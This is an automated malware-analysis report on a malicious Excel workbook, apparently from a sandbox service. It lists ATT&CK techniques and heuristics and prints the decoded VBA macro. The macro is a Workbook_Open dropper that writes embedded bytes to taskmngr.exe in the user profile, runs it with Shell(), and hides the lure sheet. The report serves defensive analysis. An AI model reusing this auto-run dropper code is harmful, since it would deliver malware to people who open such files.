Verdict: MALICIOUS
Risk Score: 196

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1027 Obfuscated Files or Information
- T1204.002 Malicious File
The sample is an Excel document with a Workbook_Open macro that is designed to execute automatically. The macro attempts to write a payload to the user's profile directory as 'taskmngr.exe' and then execute it using the Shell() function. The presence of the 'Enable Content' lure in the document body further supports the malicious intent.
Heuristics (7)

- VBA project inside OOXML (medium; OOXML_VBA; 4 related findings): Document contains a VBA project — VBA macros present
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high; OLE_VBA_WBOPEN): Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low; OLE_VBA_ENVIRON): Environ() call (env variable access)
- Macro/content-enable lure (medium; SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Hidden worksheet (veryHidden) (low; OOXML_HIDDEN_SHEET): Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1700 bytes | 606eb9ac3f5561e68e972af45fb57232bdccc70af0d2f132b7370e92a98c7f33 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim sFileText As String
Dim allFIleText As String
iFileNo = FreeFile
allFIleText = ""
sFileText = ""
For Each ws In ThisWorkbook.Worksheets
If ws.Name <> "Start" Then
ws.Visible = xlSheetVisible
End If
Next ws
Sheets("Start").Visible = xlVeryHidden
Set cp = Sheet1.CustomProperties
allFIleText = Sheet1.CustomProperties.Item(1).Value
Dim TestArray() As String
TestArray = Split(allFIleText, "|")
Dim i As Long
Dim filename As String
filename = Environ("USERPROFILE") & "\taskmngr.exe"
If Not Dir(filename) <> "" Then
Open filename For Binary Lock Read Write As #2
For i = 0 To 8191
Put #2, , CByte(TestArray(i))
Next
Close #2
End If
Dim RetVal As Long
RetVal = Shell(filename, 1)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 12800 bytes | dfdcae580053a6c769becdfe66d2799468dad4a48c1197fccd6c732f9d4eee05 |